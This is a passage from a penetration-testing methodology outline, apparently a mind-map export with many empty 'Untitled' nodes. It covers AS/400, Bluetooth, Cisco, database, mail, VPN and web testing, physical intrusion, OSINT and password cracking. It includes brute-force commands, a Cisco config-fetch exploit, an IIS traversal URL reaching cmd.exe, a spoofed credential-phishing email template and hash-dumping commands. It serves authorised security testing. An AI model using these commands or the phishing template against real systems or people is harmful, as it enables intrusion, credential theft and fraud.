20.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3

20.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0

20.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3

20.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3

20.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3

20.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0

20.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3

20.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3

20.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3

20.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3

20.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3

20.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3

20.1.3.2. Access with Work Station Gateway

20.1.3.2.1. http://target:5061/WSG

20.1.3.2.2. Default AS/400 accounts.

20.1.3.3. Network attacks (next release)

20.1.3.3.1. DB2

20.1.3.3.2. QSHELL

20.1.3.3.3. Hijacking Terminals

20.1.3.3.4. Trojan attacks

20.1.3.3.5. Hacking from AS/400

20.2. Local

20.2.1. System Value Security

20.2.1.1. Untitled

20.2.1.1.1. Untitled

20.2.1.2. Untitled

20.2.1.2.1. Untitled

20.2.1.3. Untitled

20.2.1.3.1. Untitled

20.2.1.4. Untitled

20.2.1.4.1. Recommended value is 30

20.2.2. Password Policy

20.2.2.1. Untitled

20.2.2.1.1. Untitled

20.2.2.1.2. Untitled

20.2.2.2. Untitled

20.2.2.2.1. Untitled

20.2.2.3. Untitled

20.2.2.3.1. Untitled

20.2.2.4. Untitled

20.2.2.4.1. Untitled

20.2.2.5. Untitled

20.2.3. Audit level

20.2.3.1. Untitled

20.2.3.1.1. Recommended value is *SECURITY

20.2.4. Documentation

20.2.4.1. Users class

20.2.4.1.1. Untitled

20.2.4.2. System Audit Settings

20.2.4.2.1. Untitled

20.2.4.3. Special Authorities Definitions

20.2.4.3.1. Untitled

21. Bluetooth Specific Testing

21.1. Bluescanner

21.2. Bluesweep

21.3. btscanner

21.4. Redfang

21.5. Blueprint

21.6. Bluesnarfer

21.7. Bluebugger

21.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

21.8. Blueserial

21.9. Bloover

21.10. Bluesniff

21.11. Exploit Frameworks

21.11.1. BlueMaho

21.11.1.1. Untitled

21.12. Resources

21.12.1. URL's

21.12.1.1. BlueStumbler.org

21.12.1.2. Bluejackq.com

21.12.1.3. Bluejacking.com

21.12.1.4. Bluejackers

21.12.1.5. bluetooth-pentest

21.12.1.6. ibluejackedyou.com

21.12.1.7. Trifinite

21.12.2. Vulnerability Information

21.12.2.1. Common Vulnerabilities and Exploits (CVE)

21.12.2.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth

21.12.3. White Papers

21.12.3.1. Bluesnarfing

22. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt

23. Cisco Specific Testing

23.1. Methodology

23.1.1. Scan & Fingerprint.

23.1.1.1. Untitled

23.1.1.2. Untitled

23.1.1.3. If SNMP is active, then community string guessing should be performed.

23.1.2. Credentials Guessing.

23.1.2.1. Untitled

23.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

23.1.3. Connect

23.1.3.1. Untitled

23.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

23.1.4. Check for bugs

23.1.4.1. Untitled

23.1.4.1.1. The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact. 

23.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

23.1.5. Further your attack

23.1.5.1. Untitled

23.1.5.1.1. running-config is the currently running configuration settings.  This gets loaded from the startup-config on boot.  This configuration file is editable and the changes are immediate.  Any changes will be lost once the router is rebooted.  It is this file that requires altering to maintain a non-permenant connection through to the internal network.  

23.1.5.1.2. startup-config is the boot up configuration file.  It is this file that needs altering to maintain a permenant  connection through to the internal network.  

23.1.5.2. Untitled

23.1.5.2.1. #> access-list 100 permit ip <IP> any

23.2. Scan & Fingerprint.

23.2.1. Port Scanning

23.2.1.1. nmap

23.2.1.1.1. Untitled

23.2.1.2. Other tools

23.2.1.2.1. Untitled

23.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

23.2.2. Fingerprinting

23.2.2.1. Untitled

23.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175

23.2.2.2. Untitled

23.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

23.2.2.2.2. Untitled

23.3. Password Guessing.

23.3.1. Untitled

23.3.1.1. ./CAT  -h  <IP>  -a  password.wordlist

23.3.1.2. Untitled

23.3.2. Untitled

23.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]

23.3.2.2. Untitled

23.3.3. Untitled

23.3.3.1. BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco

23.3.3.2. Untitled

23.4. SNMP Attacks.

23.4.1. Untitled

23.4.1.1. ./CAT  -h  <IP>  -w  SNMP.wordlist

23.4.1.2. Untitled

23.4.2. Untitled

23.4.2.1. onesixytone  -c  SNMP.wordlist  <IP>

23.4.2.2. BT onesixtyone-0.3.2 # onesixtyone  -c  dict.txt  10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug

23.4.3. Untitled

23.4.3.1. snmapwalk  -v  <Version>  -c  <Community string>  <IP>

23.4.3.2. Untitled

23.5. Connecting.

23.5.1. Telnet

23.5.1.1. Untitled

23.5.1.1.1.  telnet  <IP>

23.5.1.1.2. Sample Banners

23.5.2. SSH

23.5.3. Web Browser

23.5.3.1. Untitled

23.5.3.1.1. This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:

23.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:

23.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

23.5.4. TFTP

23.5.4.1. Untitled

23.5.4.1.1. Untitled

23.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names.

23.5.4.2. Untitled

23.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>

23.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>

23.5.4.2.3. Creating backdoors in Cisco IOS using TCL

23.6. Known Bugs.

23.6.1. Attack Tools

23.6.1.1. Untitled

23.6.1.1.1. Untitled

23.6.1.2. Untitled

23.6.1.2.1. Web browse to the Cisco device: http://<IP>

23.6.1.2.2. Untitled

23.6.1.2.3. Untitled

23.6.1.2.4. Untitled

23.6.1.3. Untitled

23.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt

23.6.2. Common Vulnerabilities and Exploits (CVE) Information

23.6.2.1. Vulnerabilties and exploit information relating to these products can be found here:http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

23.7. Configuration Files.

23.7.1. Untitled

23.7.1.1. Configuration files explained

23.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.

23.7.1.1.2. Untitled

23.7.1.1.3. Untitled

23.7.1.1.4. Password Encryption Utilised

23.7.1.1.5. Untitled

23.7.1.2. Configuration Testing Tools

23.7.1.2.1. Nipper

23.7.1.2.2. fwauto (Beta)

23.8. References.

23.8.1. Cisco IOS Exploitation Techniques

24. Server Specific Tests

24.1. Databases

24.1.1. Direct Access Interrogation

24.1.1.1. MS SQL Server

24.1.1.1.1. Ports

24.1.1.1.2. Version

24.1.1.1.3. osql

24.1.1.2. Oracle

24.1.1.2.1. Ports

24.1.1.2.2. TNS Listener

24.1.1.2.3. SQL Plus

24.1.1.2.4. Default Account/Passwords

24.1.1.2.5. Default SID's

24.1.1.3. MySQL

24.1.1.3.1. Ports

24.1.1.3.2. Version

24.1.1.3.3. Users/Passwords

24.1.1.4. DB2

24.1.1.5. Informix

24.1.1.6. Sybase

24.1.1.7. Other

24.1.2. Scans

24.1.2.1. Default Ports

24.1.2.2. Non-Default Ports

24.1.2.3. Instance Names

24.1.2.4. Versions

24.1.3. Password Attacks

24.1.3.1. Sniffed Passwords

24.1.3.1.1. Cracked Passwords

24.1.3.1.2. Hashes

24.1.3.2. Direct Access Guesses

24.1.4. Vulnerability Assessment

24.1.4.1. Automated

24.1.4.1.1. Reports

24.1.4.1.2. Vulnerabilities

24.1.4.2. Manual

24.1.4.2.1. Patch Levels

24.1.4.2.2. Confirmed Vulnerabilities

24.2. Mail

24.2.1. Scans

24.2.2. Fingerprint

24.2.2.1. Manual

24.2.2.2. Automated

24.2.3. Spoofable

24.2.3.1. Telnet spoof

24.2.3.1.1. telnet target_IP 25helo target.commail from: XXXX@XXX.comrcpt to: administrator@target.comdataX-Sender: XXXX@XXX.comX-Originating-IP: [192.168.1.1]X-Originating-Email: [XXXX@XXX.com]MIME-Version: 1.0To: <administrator@target.com>From: < XXXX@XXX.com >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target LtdXXXX@XXX.com.

24.2.4. Relays

24.3. VPN

24.3.1. Scanning

24.3.1.1. 500 UDP IPSEC

24.3.1.2. 1723 TCP PPTP

24.3.1.3. 443 TCP/SSL

24.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27

24.3.1.5. ipsecscan 80.75.68.22 80.75.68.27

24.3.2. Fingerprinting

24.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27

24.3.3. PSK Crack

24.3.3.1. ikeprobe 80.75.68.27

24.3.3.2. sniff for responses with C&A or ikecrack

24.4. Web

24.4.1. Vulnerability Assessment

24.4.1.1. Automated

24.4.1.1.1. Reports

24.4.1.1.2. Vulnerabilities

24.4.1.2. Manual

24.4.1.2.1. Patch Levels

24.4.1.2.2. Confirmed Vulnerabilities

24.4.2. Permissions

24.4.2.1. PUT /test.txt HTTP/1.0

24.4.2.2. CONNECT mail.another.com:25 HTTP/1.0

24.4.2.3. POST http://mail.another.com:25/ HTTP/1.0Content-Type: text/plainContent-Length: 6

24.4.3. Scans

24.4.4. Fingerprinting

24.4.4.1. Other

24.4.4.2. HTTP

24.4.4.2.1. Commands

24.4.4.2.2. Modules

24.4.4.2.3. File Extensions

24.4.4.3. HTTPS

24.4.4.3.1. Commands

24.4.4.3.2. Commands

24.4.4.3.3. File Extensions

24.4.5. Directory Traversal

24.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

25. http://secunia.com/advisories/search/?search=citrix

26. Physical Security

26.1. Building Security

26.1.1. Meeting Rooms

26.1.1.1. Check for active network jacks.

26.1.1.2. Check for any information in room.

26.1.2. Lobby

26.1.2.1. Check for active network jacks.

26.1.2.2. Does receptionist/guard leave lobby?

26.1.2.3. Accessbile printers? Print test page.

26.1.2.4. Obtain phone/personnel listing.

26.1.3. Communal Areas

26.1.3.1. Check for active network jacks.

26.1.3.2. Check for any information in room.

26.1.3.3. Listen for employee conversations.

26.1.4. Room Security

26.1.4.1. Resistance of lock to picking.

26.1.4.1.1. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors?

26.1.4.2. Ceiling access areas.

26.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

26.1.5. Windows

26.1.5.1. Check windows/doors for visible intruderalarm sensors.

26.1.5.2. Check visible areas for sensitive information.

26.1.5.3. Can you video users logging on?

26.2. Perimeter Security

26.2.1. Fence Security

26.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.

26.2.2. Exterior Doors

26.2.2.1. If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.

26.2.3. Guards

26.2.3.1. Patrol Routines

26.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.

26.2.3.2. Communications

26.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.

26.3. Entry Points

26.3.1. Guarded Doors

26.3.1.1. Piggybacking

26.3.1.1.1. Attempt to closely follow employees into thebuilding without having to show valid credentials.

26.3.1.2. Fake ID

26.3.1.2.1. Attempt to use fake ID to gain access.

26.3.1.3. Access Methods

26.3.1.3.1. Test 'out of hours' entry methods

26.3.2. Unguarded Doors

26.3.2.1. Identify all unguardedentry points.

26.3.2.1.1. Are doors secured?

26.3.2.1.2. Check locks for resistance to lock picking.

26.3.3. Windows

26.3.3.1. Check windows/doors for visible intruderalarm sensors.

26.3.3.1.1. Attempt to bypass sensors.

26.4. Office Waste

26.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc

27. Final Report - template

28. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

28.1. Untitled

28.1.1. Authoratitive Bodies

28.1.1.1. IANA - Internet Assigned Numbers Authority

28.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.

28.1.1.3. NRO - Number Resource Organisation

28.1.1.4. RIR - Regional Internet Registry

28.1.1.4.1. AFRINIC - African Network Information Centre

28.1.1.4.2. APNIC - Asia Pacific Network Information Centre

28.1.1.4.3. ARIN - American Registry for Internet Numbers

28.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre

28.1.1.4.5. RIPE - Reseaux IP Européens—Network Coordination Centre

28.1.2. Websites

28.1.2.1. Central Ops

28.1.2.1.1. Domain Dossier

28.1.2.1.2. Email Dossier

28.1.2.2. DNS Stuff

28.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.

28.1.2.3. Fixed Orbit

28.1.2.3.1. Autonomous System lookups and other online tools available.

28.1.2.4. Geektools

28.1.2.5. IP2Location

28.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.

28.1.2.6. Kartoo

28.1.2.6.1. Metasearch engine that visually presents its results.

28.1.2.7. MyIPNeighbors.com

28.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution

28.1.2.8. My-IP-Neighbors.com

28.1.2.8.1. Excellent site that can be used if the above is down

28.1.2.9. myipneighbors.net

28.1.2.10. Netcraft

28.1.2.10.1. Online search tool allowing queries for host information.

28.1.2.11. Passive DNS Replication

28.1.2.11.1. Finds shared domains based on supplied IP addresses

28.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script

28.1.2.12. Robtex

28.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.

28.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)

28.1.2.13. Traceroute.org

28.1.2.13.1. Website listing a large number links to online traceroute resources.

28.1.2.14. Wayback Machine

28.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

28.1.2.15. Whois.net

28.1.3. Tools

28.1.3.1. Cheops-ng

28.1.3.2. Country whois

28.1.3.3. Domain Research Tool

28.1.3.4. Firefox Plugins

28.1.3.4.1. AS Number

28.1.3.4.2. Shazou

28.1.3.4.3. Firecat Suite

28.1.3.5. Gnetutil

28.1.3.6. Goolag Scanner

28.1.3.7. Greenwich

28.1.3.8. Maltego

28.1.3.9. GTWhois

28.1.3.10. Sam Spade

28.1.3.11. Smart whois

28.1.3.12. SpiderFoot

28.2. Internet Search

28.2.1. General Information

28.2.1.1. Web Investigator

28.2.1.2. Tracesmart

28.2.1.3. Friends Reunited

28.2.1.4. Ebay - profiles etc.

28.2.2. Financial

28.2.2.1. EDGAR - Company information, including real-time filings. US

28.2.2.2. Google Finance - General Finance Portal

28.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK

28.2.2.4. Companies House UK

28.2.2.5. Land Registry UK

28.2.3. Phone book/ Electoral Role Information

28.2.3.1. 123people

28.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world

28.2.3.2. 192.com

28.2.3.2.1. Electoral Role Search. UK

28.2.3.3. 411

28.2.3.3.1. Online White Pages and Yellow Pages. US

28.2.3.4. Untitled

28.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US

28.2.3.5. BT.com. UK

28.2.3.5.1. Residential

28.2.3.5.2. Business

28.2.3.6. Pipl

28.2.3.6.1. Untitled

28.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1

28.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1

28.2.3.7. Spokeo

28.2.3.7.1. http://www.spokeo.com/user?q=domain_name

28.2.3.7.2. http://www.spokeo.com/user?q=email_address

28.2.3.8. Yasni

28.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword

28.2.3.9. Zabasearch

28.2.3.9.1. People Search Engine. US

28.2.4. Generic Web Searching

28.2.4.1. Code Search

28.2.4.2. Forum Entries

28.2.4.3. Google Hacking Database

28.2.4.4. Google

28.2.4.4.1. Email Addresses

28.2.4.4.2. Contact Details

28.2.4.5. Newsgroups/forums

28.2.4.6. Blog Search

28.2.4.6.1. Yammer

28.2.4.6.2. Google Blog Search

28.2.4.6.3. Technorati

28.2.4.6.4. Jaiku

28.2.4.6.5. Present.ly

28.2.4.6.6. Twitter Network Browser

28.2.4.7. Search Engine Comparison/ Aggregator Sites

28.2.4.7.1. Clusty

28.2.4.7.2. Grokker

28.2.4.7.3. Zuula

28.2.4.7.4. Exalead

28.2.4.7.5. Delicious

28.2.5. Metadata Search

28.2.5.1. Untitled

28.2.5.1.1. MetaData Visualisation Sites

28.2.5.1.2. Tools

28.2.5.1.3. Wikipedia Metadata Search

28.2.6. Social/ Business Networks

28.2.6.1. Untitled

28.2.6.1.1. Africa

28.2.6.1.2. Australia

28.2.6.1.3. Belgium

28.2.6.1.4. Holland

28.2.6.1.5. Hungary

28.2.6.1.6. Iran

28.2.6.1.7. Japan

28.2.6.1.8. Korea

28.2.6.1.9. Poland

28.2.6.1.10. Russia

28.2.6.1.11. Sweden

28.2.6.1.12. UK

28.2.6.1.13. US

28.2.6.1.14. Assorted

28.2.7. Resources

28.2.7.1. OSINT

28.2.7.2. International Directory of Search Engines

28.3. DNS Record Retrieval from publically available servers

28.3.1. Types of Information Records

28.3.1.1. SOA Records - Indicates the server that has authority for the domain.

28.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).

28.3.1.3. NS Records - List of a host’s or domain’s name server(s).

28.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.

28.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.

28.3.1.6. SRV Records - Service location record.

28.3.1.7. HINFO Records - Host information record with CPU type and operating system.

28.3.1.8. TXT Records - Generic text record.

28.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.

28.3.1.10. RP - Responsible person for the domain.

28.3.2. Database Settings

28.3.2.1. Version.bind

28.3.2.2. Serial

28.3.2.3. Refresh

28.3.2.4. Retry

28.3.2.5. Expiry

28.3.2.6. Minimum

28.3.3. Sub Domains

28.3.4. Internal IP ranges

28.3.4.1. Reverse DNS for IP Range

28.3.5. Zone Transfer

28.4. Social Engineering

28.4.1. Remote

28.4.1.1. Phone

28.4.1.1.1. Scenarios

28.4.1.1.2. Results

28.4.1.1.3. Contact Details

28.4.1.2. Email

28.4.1.2.1. Scenarios

28.4.1.2.2. Software

28.4.1.2.3. Results

28.4.1.2.4. Contact Details

28.4.1.3. Other

28.4.2. Local

28.4.2.1. Personas

28.4.2.1.1. Name

28.4.2.1.2. Phone

28.4.2.1.3. Email

28.4.2.1.4. Business Cards

28.4.2.2. Contact Details

28.4.2.2.1. Name

28.4.2.2.2. Phone number

28.4.2.2.3. Email

28.4.2.2.4. Room number

28.4.2.2.5. Department

28.4.2.2.6. Role

28.4.2.3. Scenarios

28.4.2.3.1. New IT employee

28.4.2.3.2. Fire Inspector

28.4.2.4. Results

28.4.2.5. Maps

28.4.2.5.1. Satalitte Imagery

28.4.2.5.2. Building layouts

28.4.2.6. Other

28.5. Dumpster Diving

28.5.1. Rubbish Bins

28.5.2. Contract Waste Removal

28.5.3. Ebay ex-stock sales i.e. HDD

28.6. Web Site copy

28.6.1. htttrack

28.6.2. teleport pro

28.6.3. Black Widow

29. Password cracking

29.1. Rainbow crack

29.1.1. ophcrack

29.1.2. rainbow tables

29.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt

29.2. Ophcrack

29.3. Cain & Abel

29.4. John the Ripper

29.4.1. ./unshadow passwd shadow > file_to_crack

29.4.2. ./john -single file_to_crack

29.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

29.4.4. ./john -show file_to_crack

29.4.5. ./john --incremental:All file_to_crack

29.5. fgdump

29.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

29.6. pwdump6

29.7. medusa

29.8. LCP

29.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada

29.9.1. Domain credentials

29.9.2. Sniffing

29.9.3. pwdump import

29.9.4. sam import

29.10. aiocracker

29.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list